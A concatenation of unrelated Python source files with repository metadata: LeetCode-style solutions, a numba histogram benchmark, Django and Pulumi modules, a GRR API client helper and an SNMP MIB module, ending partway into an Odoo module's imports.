| 2017-11-01T05:05:23
| 2017-11-01T05:05:23
| 108,808,749
| 0
| 0
| null | 2017-10-30T06:06:41
| 2017-10-30T06:06:41
| null |
UTF-8
|
Python
| false
| false
| 1,726
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
###############################################################################
# Module: cdc_processor
# Purpose: Processes CDCs polled from Kafka queue
#
# Notes:
#
###############################################################################
import logging
from abc import ABCMeta, abstractmethod
class Processor(object):
__metaclass__ = ABCMeta
def __init__(self):
self._set_logger()
def _set_logger(self):
self._logger = logging.getLogger(__name__)
def renew_workdirectory(self):
self._set_logger()
@abstractmethod
def deserialise(self):
pass
@abstractmethod
def process(self, stream_message):
"""Process CDC messsage into a statement
:param dict stream_message: Stream message payload polled from queue
:return: Statement object representing the statement to apply to target
:rtype: Statement
"""
pass
|
[
"simon.aubury@iag.com.au"
] |
simon.aubury@iag.com.au
|
244537803eabece33bf150b7a3e93cf37db117cb
|
b0eef0efd10556a4b054574fdd2d43124cb0856b
|
/npbench/benchmarks/azimint_hist/azimint_hist_numba_np.py
|
a59941dc12823543eda3a331f4260532d55b9226
|
[
"BSD-3-Clause"
] |
permissive
|
learning-chip/npbench
|
140d38be2095b54393de6e0008264b54b7cf686b
|
f2f545afe3603d5c8f1771f26d660f25ce4a3cda
|
refs/heads/main
| 2023-05-10T09:54:52.719759
| 2021-05-31T12:09:48
| 2021-05-31T12:09:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,291
|
py
|
# Copyright 2014 Jérôme Kieffer et al.
# This is an open-access article distributed under the terms of the
# Creative Commons Attribution License, which permits unrestricted use,
# distribution, and reproduction in any medium, provided the original author
# and source are credited.
# http://creativecommons.org/licenses/by/3.0/
# Jérôme Kieffer and Giannis Ashiotis. Pyfai: a python library for
# high performance azimuthal integration on gpu, 2014. In Proceedings of the
# 7th European Conference on Python in Science (EuroSciPy 2014).
# BSD 2-Clause License
# Copyright (c) 2017, Numba
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import numba as nb
@nb.jit(nopython=True, parallel=True, fastmath=True)
def get_bin_edges_parallel(a, bins):
bin_edges = np.zeros((bins + 1, ), dtype=np.float64)
a_min = a.min()
a_max = a.max()
delta = (a_max - a_min) / bins
for i in range(bin_edges.shape[0]):
bin_edges[i] = a_min + i * delta
bin_edges[-1] = a_max # Avoid roundoff error on last point
return bin_edges
@nb.jit(nopython=True, fastmath=True)
def compute_bin(x, bin_edges):
# assuming uniform bins for now
n = bin_edges.shape[0] - 1
a_min = bin_edges[0]
a_max = bin_edges[-1]
# special case to mirror NumPy behavior for last bin
if x == a_max:
return n - 1 # a_max always in last bin
return int(n * (x - a_min) / (a_max - a_min))
@nb.jit(nopython=True, parallel=True, fastmath=True)
def histogram_parallel(a, bins, weights):
hist = np.zeros((bins, ), dtype=a.dtype)
bin_edges = get_bin_edges_parallel(a, bins)
for i in range(a.shape[0]):
bin = compute_bin(a[i], bin_edges)
hist[bin] += weights[i]
return hist, bin_edges
@nb.jit(nopython=True, parallel=True, fastmath=True)
def azimint_hist(data, radius, npt):
histu = np.histogram(radius, npt)[0]
# histw = np.histogram(radius, npt, weights=data)[0]
histw = histogram_parallel(radius, npt, weights=data)[0]
return histw / histu
|
[
"alexandros.ziogas@inf.ethz.ch"
] |
alexandros.ziogas@inf.ethz.ch
|
b07b16db3d774aac0bbdc84ffbfe276598532c9b
|
fc353b0433348ff58841cf32bf1f5e594e037513
|
/leetcode/414.Third Maximum Number.py
|
ca03468944b1979e12857f95f61398921bb8c3d2
|
[] |
no_license
|
TrellixVulnTeam/Demo_933I
|
ce759ec52dd191f99b998862f4aba7971878ba37
|
ab662060eb07a88a48c9832e09bf268517c1a3fa
|
refs/heads/master
| 2023-04-27T16:55:29.627491
| 2021-05-07T05:38:58
| 2021-05-07T05:38:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,215
|
py
|
# Given a non-empty array of integers, return the third maximum number in this a
# rray. If it does not exist, return the maximum number. The time complexity must
# be in O(n).
#
# Example 1:
#
# Input: [3, 2, 1]
#
# Output: 1
#
# Explanation: The third maximum is 1.
#
#
#
# Example 2:
#
# Input: [1, 2]
#
# Output: 2
#
# Explanation: The third maximum does not exist, so the maximum (2) is returned
# instead.
#
#
#
# Example 3:
#
# Input: [2, 2, 3, 1]
#
# Output: 1
#
# Explanation: Note that the third maximum here means the third maximum distinct
# number.
# Both numbers with value 2 are both considered as second maximum.
#
# Related Topics Array
# 👍 836 👎 1515
# region time
# 2020-12-30 23:36:42
# endregion
# leetcode submit region begin(Prohibit modification and deletion)
class Solution:
def thirdMax(self, nums) -> int:
nums = list(set(nums))
if len(nums) < 3:
return max(nums)
nums.sort(reverse=True)
return nums[2]
# leetcode submit region end(Prohibit modification and deletion)
if __name__ == '__main__':
# n = [3, 2, 1]
# n = [2, 2, 3, 1]
n = [1, 1, 2]
print(Solution().thirdMax(n))
|
[
"1149061045@qq.com"
] |
1149061045@qq.com
|
7516852dd574508330178cbc13a9ed763a228644
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/MtktG9Dz7z9vBCFYM_1.py
|
b19055d28322e4de6c3ee44a3d7684ed9c0daf4d
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 472
|
py
|
"""
Write a function that takes an IP address and returns the domain name using
PTR DNS records.
### Example
get_domain("8.8.8.8") ➞ "dns.google"
get_domain("8.8.4.4") ➞ "dns.google"
### Notes
* You may want to import `socket`.
* Don't cheat and just print the domain name, you need to make a real DNS request.
* Return as a string.
"""
import socket as sk
def get_domain(ip_address):
return sk.getfqdn(sk.gethostbyaddr(ip_address)[0])
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
95e1625f25d743050cb651088f93e69da0459865
|
e0d404675839dc10bc1e995be4c35a69ab9133a5
|
/api_client/python/grr_api_client/config.py
|
18fe1aba06e22f8e98221caa6d7e3312da7a36a9
|
[
"Apache-2.0"
] |
permissive
|
feitianyiren/grr
|
4afebc4a1912d46b4df4f1b4b0d25500505d05e5
|
9cc014f44ea9b21166e3b6815eb218d39f37fa07
|
refs/heads/master
| 2020-04-09T02:53:22.199635
| 2018-11-28T10:54:52
| 2018-11-28T10:54:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,804
|
py
|
#!/usr/bin/env python
"""Functions and objects to access config-related GRR API methods."""
from __future__ import absolute_import
from __future__ import unicode_literals
from grr_api_client import utils
from grr_response_proto.api import config_pb2
class GrrBinaryBase(object):
"""Base class for GrrBinary references and objects."""
def __init__(self, binary_type=None, path=None, context=None):
super(GrrBinaryBase, self).__init__()
if not binary_type:
raise ValueError("binary_type can't be empty")
if not path:
raise ValueError("path can't be empty")
if not context:
raise ValueError("context can't be empty")
self.binary_type = binary_type
self.path = path
self._context = context
def Get(self):
args = config_pb2.ApiGetGrrBinaryArgs(type=self.binary_type, path=self.path)
data = self._context.SendRequest("GetGrrBinary", args)
return GrrBinary(data=data, context=self._context)
def GetBlob(self):
args = config_pb2.ApiGetGrrBinaryBlobArgs(
type=self.binary_type, path=self.path)
return self._context.SendStreamingRequest("GetGrrBinaryBlob", args)
class GrrBinaryRef(GrrBinaryBase):
"""GRR binary reference (points to one, but has no data)."""
class GrrBinary(GrrBinaryBase):
"""GRR binary object with fetched data."""
def __init__(self, data=None, context=None):
if data is None:
raise ValueError("data can't be None")
super(GrrBinary, self).__init__(
binary_type=data.type, path=data.path, context=context)
self.data = data
def ListGrrBinaries(context=None):
"""Lists all registered Grr binaries."""
items = context.SendIteratorRequest("ListGrrBinaries", None)
return utils.MapItemsIterator(
lambda data: GrrBinary(data=data, context=context), items)
|
[
"realbushman@gmail.com"
] |
realbushman@gmail.com
|
384f2c32d83751bbaee4e8bf82c84cbdb8560799
|
db1592ee9ba472d2a2f94056ac32b255deb69ecd
|
/hog/api/migrations/0007_auto_20190618_1648.py
|
03bfdfd56703771d235c0fe8b69f4fc89eb337bf
|
[] |
no_license
|
tech4nature/hogapp
|
3fadcad8353dd2cecdc97eff87d0f196e144a2f5
|
24d50c9756853534e1dafdccbf3609fd512f253a
|
refs/heads/main
| 2023-03-07T00:45:53.100651
| 2022-07-09T13:00:16
| 2022-07-09T13:00:16
| 175,845,744
| 1
| 0
| null | 2023-02-15T19:58:09
| 2019-03-15T15:27:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,182
|
py
|
# Generated by Django 2.1.7 on 2019-06-18 16:48
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('api', '0006_location_coords'),
]
operations = [
migrations.AddField(
model_name='measurement',
name='video_poster',
field=models.FileField(blank=True, null=True, upload_to='posters'),
),
migrations.AlterField(
model_name='hog',
name='code',
field=models.CharField(max_length=80, primary_key=True, serialize=False, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), "Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens.", 'invalid')]),
),
migrations.AlterField(
model_name='location',
name='code',
field=models.CharField(max_length=80, primary_key=True, serialize=False, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), "Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens.", 'invalid')]),
),
]
|
[
"seb.bacon@gmail.com"
] |
seb.bacon@gmail.com
|
ed2d8e730e1f68799c443568132b6b04df8ed6f2
|
9f884a3584eef771f8c010e296c5d763098be243
|
/povary/apps/recipes/urls.py
|
8e69a1a748b52fe7ca90910cd8edfb48e5a05e85
|
[
"BSD-3-Clause"
] |
permissive
|
TorinAsakura/cooking
|
fc8658ce2ac21c2e00dc307399a5fa24971a20c1
|
cf0c78f613fa9ce0fcd4ec7a397ab880d9dd631a
|
refs/heads/master
| 2023-01-24T13:07:38.529811
| 2020-12-08T22:14:33
| 2020-12-08T22:14:33
| 319,773,012
| 0
| 0
|
BSD-3-Clause
| 2020-12-08T22:14:34
| 2020-12-08T22:08:34
| null |
UTF-8
|
Python
| false
| false
| 1,408
|
py
|
# -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from recipes.views import RecipeWizard
from recipes.forms import RecipeFormStep1, RecipeFormStep2, RecipeFormStep3, IngredientForm
from django.forms.formsets import formset_factory
FORMS = [("first", RecipeFormStep1),
("second", formset_factory(IngredientForm)),
("third", RecipeFormStep3)]
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'povary.views.home', name='home'),
# url(r'^povary/', include('povary.foo.urls')),
url(r'add_recipe_to_box/(?P<recipe_slug>.*)/$', 'recipes.views.add_recipe_to_box', name='add_recipe_to_box'),
url(r'^$', 'recipes.views.recipe_list', name='recipe_list'),
url(r'^add/$', RecipeWizard.as_view(FORMS), name="recipe-add"),
url(r'^cakes/$', 'recipes.views.cake_recipe_list', name='cake_recipe_list'),
# url(r'^categories/(?P<category_slug>.*)/(?P<subcategory_slug>.*)/$',
# 'recipes.views.subcategory_details',
# name='subcategory_details'),
# url(r'^categories/(?P<category_slug>.*)/$', 'recipes.views.category_details', name='category_details'),
url(r'^ajax/(?P<recipe_slug>.*)/set_portion/$', 'recipes.views.set_portion', name='set_portion'),
url(r'^ajax/(?P<recipe_slug>.*)/wish/$', 'recipes.views.wish', name='wish'),
url(r'^(?P<recipe_slug>.*)/$', 'recipes.views.recipe_details', name='recipe_details'),
)
|
[
"me@torinasakura.name"
] |
me@torinasakura.name
|
9068990897aab8e31bc3528c0d1e5e71e9ac3716
|
ded13e921c8365c6113911a5834969ec3d33f989
|
/190/Reverse Bits.py
|
daf8020e90da61121938b47c386e6a71c42cebc4
|
[] |
no_license
|
ArrayZoneYour/LeetCode
|
b7b785ef0907640623e5ab8eec1b8b0a9d0024d8
|
d09f56d4fef859ca4749dc753d869828f5de901f
|
refs/heads/master
| 2021-04-26T23:03:10.026205
| 2018-05-09T15:49:08
| 2018-05-09T15:49:08
| 123,922,098
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
# /usr/bin/python
# coding: utf-8
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
bit_list = []
for i in range(32):
if n == 0:
bit_list.append(0)
else:
bit_list.append(n % 2)
n //= 2
size = 1
result = 0
for bit in bit_list[::-1]:
if bit != 0:
result += bit * size
size *= 2
return result
print(Solution().reverseBits(43261596))
|
[
"hustliyidong@gmail.com"
] |
hustliyidong@gmail.com
|
f88454fa9aec4c56926c2ca6e93a4e29b4d5ed11
|
2c32cf726e111b8625265c458feeaea436652e83
|
/pramp-condility-3month/mid-ll-03.py
|
1e8be57a8c2ad51d2eaf8186bda15d8dd284e8ed
|
[] |
no_license
|
minhthe/practice-algorithms-and-data-structures
|
6fa3bf98e8e2fe98f4e32419fb797b1df4400364
|
488a82dd3a0c797859a6c9e1195d6d579d676073
|
refs/heads/master
| 2021-05-16T23:01:20.026475
| 2020-09-23T04:17:13
| 2020-09-23T04:17:13
| 250,505,610
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 281
|
py
|
'''https://leetcode.com/problems/middle-of-the-linked-list/'''
class Solution:
def middleNode(self, head: ListNode) -> ListNode:
slow = head
fast = head
while slow.next :
slow = slow.next
fast = fast.next.next
if not fast or not fast.next: return slow
return slow
|
[
"minhthe.007@gmail.com"
] |
minhthe.007@gmail.com
|
1bfe256e98b3819a009084e61cbab623b1b98742
|
2a68b03c923119cc747c4ffcc244477be35134bb
|
/Algorithm/BFS/cutOffTreesForGolf.py
|
2a98a13b8ff88d702b43e4e35845dcc69aa477f3
|
[] |
no_license
|
QitaoXu/Lintcode
|
0bce9ae15fdd4af1cac376c0bea4465ae5ea6747
|
fe411a0590ada6a1a6ae1166c86c585416ac8cda
|
refs/heads/master
| 2020-04-24T20:53:27.258876
| 2019-09-24T23:54:59
| 2019-09-24T23:54:59
| 172,259,064
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,554
|
py
|
from collections import deque
DIRECTIONS = [(-1, 0), (1, 0), (0, 1), (0, - 1)]
class Node:
def __init__(self, x, y, h):
self.x = x
self.y = y
self.h = h
def __lt__(self, other):
return self.h < other.h
class Solution:
"""
@param forest: a list of integers
@return: return a integer
"""
def cutOffTree(self, forest):
# write your code here
if not forest or not forest[0]:
return 0
m, n = len(forest), len(forest[0])
trees = []
for i in range(m):
for j in range(n):
if forest[i][j] > 1:
trees.append(Node(i, j, forest[i][j]))
trees.sort()
total = 0
start = Node(0, 0, forest[0][0])
while trees:
tree = trees[0]
del trees[0]
step = self.minStep(forest, start, tree, m, n)
if step < 0:
return -1
total += step
start = tree
return total
def minStep(self, forest, start, tree, m, n):
queue = deque()
seen = set()
queue.append(start)
seen.add((start.x, start.y))
step = -1
while queue:
size = len(queue)
step += 1
for _ in range(size):
node = queue.popleft()
if node.x == tree.x and node.y == tree.y:
return step
for dx, dy in DIRECTIONS:
nx, ny = node.x + dx, node.y + dy
if not self.is_valid(forest, nx, ny):
continue
if (nx, ny) in seen:
continue
queue.append(Node(nx, ny, forest[nx][ny]))
seen.add((nx, ny))
return -1
def is_valid(self, forest, x, y):
m, n = len(forest), len(forest[0])
if x < 0 or x >= m or y < 0 or y >= n:
return False
if forest[x][y] == 0:
return False
return True
|
[
"jeremyxuqitao@outlook.com"
] |
jeremyxuqitao@outlook.com
|
bb66bf071a75efcfd3911bfff82f02abb6f859f3
|
d8183ea32f7e041dc4094cb955c075586bf66b73
|
/subscriptions/api/urls.py
|
b63a5e68b48dfb2f6ec1e280cb64cdad63d00b63
|
[
"BSD-2-Clause"
] |
permissive
|
mjumbewu/django-subscriptions
|
e8426ff510f06268c3f4151e7d71ffad59fa115b
|
78a35742ec5062380aded053b64fd96cba677dac
|
refs/heads/master
| 2016-09-05T18:03:22.761915
| 2013-04-01T18:05:08
| 2013-04-01T18:05:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 289
|
py
|
from django.conf.urls.defaults import patterns, include, url
from subscriptions.api.views import SubscriptionIndex, ContentFeedRecordIndex
urlpatterns = patterns('',
url('^subscriptions/$', SubscriptionIndex.as_view()),
url('^feed_records/$', ContentFeedRecordIndex.as_view()),
)
|
[
"mjumbewu@gmail.com"
] |
mjumbewu@gmail.com
|
9cdaad47d5357ac4e8efec69e5a276d9740b076e
|
c77a40408bc40dc88c466c99ab0f3522e6897b6a
|
/Python_fundamentals/Lists_basics/InvertValues.py
|
4f376e4458c8f0257c55551b39bf912e393e5243
|
[] |
no_license
|
vbukovska/SoftUni
|
3fe566d8e9959d390a61a4845381831929f7d6a3
|
9efd0101ae496290313a7d3b9773fd5111c5c9df
|
refs/heads/main
| 2023-03-09T17:47:20.642393
| 2020-12-12T22:14:27
| 2021-02-16T22:14:37
| 328,805,705
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
string = input()
list_of_string = string.split(' ')
reverse_list = []
for i in range(len(list_of_string)):
reverse_list.append(int(list_of_string[i]) * -1)
print(reverse_list)
|
[
"vbukovska@yahoo.com"
] |
vbukovska@yahoo.com
|
508adf8642b9920d2152095cd5a761b3ab2e54c0
|
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
|
/sdk/python/pulumi_azure_native/recoveryservices/v20210201/get_protection_policy.py
|
ecf4c141423f4c2b9f265781df528fc03ccf1e76
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
bpkgoud/pulumi-azure-native
|
0817502630062efbc35134410c4a784b61a4736d
|
a3215fe1b87fba69294f248017b1591767c2b96c
|
refs/heads/master
| 2023-08-29T22:39:49.984212
| 2021-11-15T12:43:41
| 2021-11-15T12:43:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,829
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetProtectionPolicyResult',
'AwaitableGetProtectionPolicyResult',
'get_protection_policy',
'get_protection_policy_output',
]
@pulumi.output_type
class GetProtectionPolicyResult:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
"""
def __init__(__self__, e_tag=None, id=None, location=None, name=None, properties=None, tags=None, type=None):
if e_tag and not isinstance(e_tag, str):
raise TypeError("Expected argument 'e_tag' to be a str")
pulumi.set(__self__, "e_tag", e_tag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="eTag")
def e_tag(self) -> Optional[str]:
"""
Optional ETag.
"""
return pulumi.get(self, "e_tag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id represents the complete path to the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name associated with the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> Any:
"""
ProtectionPolicyResource properties
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type represents the complete path of the form Namespace/ResourceType/ResourceType/...
"""
return pulumi.get(self, "type")
class AwaitableGetProtectionPolicyResult(GetProtectionPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetProtectionPolicyResult(
e_tag=self.e_tag,
id=self.id,
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
type=self.type)
def get_protection_policy(policy_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
vault_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetProtectionPolicyResult:
"""
Base class for backup policy. Workload-specific backup policies are derived from this class.
:param str policy_name: Backup policy information to be fetched.
:param str resource_group_name: The name of the resource group where the recovery services vault is present.
:param str vault_name: The name of the recovery services vault.
"""
__args__ = dict()
__args__['policyName'] = policy_name
__args__['resourceGroupName'] = resource_group_name
__args__['vaultName'] = vault_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:recoveryservices/v20210201:getProtectionPolicy', __args__, opts=opts, typ=GetProtectionPolicyResult).value
return AwaitableGetProtectionPolicyResult(
e_tag=__ret__.e_tag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
properties=__ret__.properties,
tags=__ret__.tags,
type=__ret__.type)
@_utilities.lift_output_func(get_protection_policy)
def get_protection_policy_output(policy_name: Optional[pulumi.Input[str]] = None,
                                 resource_group_name: Optional[pulumi.Input[str]] = None,
                                 vault_name: Optional[pulumi.Input[str]] = None,
                                 opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetProtectionPolicyResult]:
    """
    Base class for backup policy. Workload-specific backup policies are derived from this class.


    :param str policy_name: Backup policy information to be fetched.
    :param str resource_group_name: The name of the resource group where the recovery services vault is present.
    :param str vault_name: The name of the recovery services vault.
    """
    # The decorator lifts get_protection_policy to accept pulumi Inputs and
    # return an Output; the body is intentionally empty.
    ...
|
[
"noreply@github.com"
] |
bpkgoud.noreply@github.com
|
be11b741bfcdd7a38ab0381a2686283f96a1864b
|
85a9ffeccb64f6159adbd164ff98edf4ac315e33
|
/pysnmp-with-texts/PCUBE-SMI.py
|
057c4bae47ebfa759260a8448e4e0cd9d353529d
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
agustinhenze/mibs.snmplabs.com
|
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
refs/heads/master
| 2020-12-26T12:41:41.132395
| 2019-08-16T15:51:41
| 2019-08-16T15:53:57
| 237,512,469
| 0
| 0
|
Apache-2.0
| 2020-01-31T20:41:36
| 2020-01-31T20:41:35
| null |
UTF-8
|
Python
| false
| false
| 3,457
|
py
|
#
# PySNMP MIB module PCUBE-SMI (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/PCUBE-SMI
# Produced by pysmi-0.3.4 at Wed May 1 12:11:29 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# Generated by pysmi from the PCUBE-SMI ASN.1 source. Symbols are resolved
# through pysnmp's mibBuilder, which the MIB loader injects into this
# module's namespace at load time (it is not imported here).
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
enterprises, ObjectIdentity, iso, Counter32, Unsigned32, Counter64, Integer32, ModuleIdentity, TimeTicks, Gauge32, IpAddress, MibIdentifier, Bits, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "ObjectIdentity", "iso", "Counter32", "Unsigned32", "Counter64", "Integer32", "ModuleIdentity", "TimeTicks", "Gauge32", "IpAddress", "MibIdentifier", "Bits", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Root OID of the P-Cube enterprise subtree: 1.3.6.1.4.1.5655
pcube = ModuleIdentity((1, 3, 6, 1, 4, 1, 5655))
pcube.setRevisions(('2002-01-14 20:00',))
# setRevisionsDescriptions is only available on newer builder versions.
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    if mibBuilder.loadTexts: pcube.setRevisionsDescriptions(('Initial version of this MIB module.',))
if mibBuilder.loadTexts: pcube.setLastUpdated('200201142000Z')
if mibBuilder.loadTexts: pcube.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: pcube.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: cs-sce@cisco.com')
if mibBuilder.loadTexts: pcube.setDescription('The Structure of Management Information for the Pcube enterprise.')
# Subtree anchors under the enterprise OID.
pcubeProducts = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 1))
if mibBuilder.loadTexts: pcubeProducts.setStatus('current')
if mibBuilder.loadTexts: pcubeProducts.setDescription('pcubeProducts is the root OBJECT IDENTIFIER from which sysObjectID values are assigned. Actual values are defined in PCUBE-PRODUCTS-MIB.')
pcubeModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 2))
if mibBuilder.loadTexts: pcubeModules.setStatus('current')
if mibBuilder.loadTexts: pcubeModules.setDescription('pcubeModules provides a root object identifier from which MODULE-IDENTITY values may be assigned.')
pcubeMgmt = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 3))
if mibBuilder.loadTexts: pcubeMgmt.setStatus('current')
if mibBuilder.loadTexts: pcubeMgmt.setDescription('pcubeMgmt is the main subtree for new MIB development.')
pcubeWorkgroup = ObjectIdentity((1, 3, 6, 1, 4, 1, 5655, 4))
if mibBuilder.loadTexts: pcubeWorkgroup.setStatus('current')
if mibBuilder.loadTexts: pcubeWorkgroup.setDescription("pcubeWorkgroup is the main subtree for objects and events of P-Cube's products.")
mibBuilder.exportSymbols("PCUBE-SMI", PYSNMP_MODULE_ID=pcube, pcubeMgmt=pcubeMgmt, pcubeProducts=pcubeProducts, pcubeModules=pcubeModules, pcubeWorkgroup=pcubeWorkgroup, pcube=pcube)
|
[
"dcwangmit01@gmail.com"
] |
dcwangmit01@gmail.com
|
3df115b3dffbcbdc55a87e74face40f87c7cca8f
|
00504f069d4f0eb93ed8777b627a6cd7de0fe94d
|
/10.0/auth_allowed_ips/__init__.py
|
4f27000c587c01350a8ffde35f37c6c282bb6e4c
|
[] |
no_license
|
Gofekra/odoo-2
|
6e1a688a9e04cc0ecd1ca91ad7fca004194f1c4a
|
a2f870a695663fe505451b6d97692433a4ea2b1d
|
refs/heads/master
| 2021-04-09T13:32:46.994819
| 2018-03-13T07:52:55
| 2018-03-13T07:52:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,733
|
py
|
# coding: utf-8
import re
import logging
from odoo import models, fields, SUPERUSER_ID, api
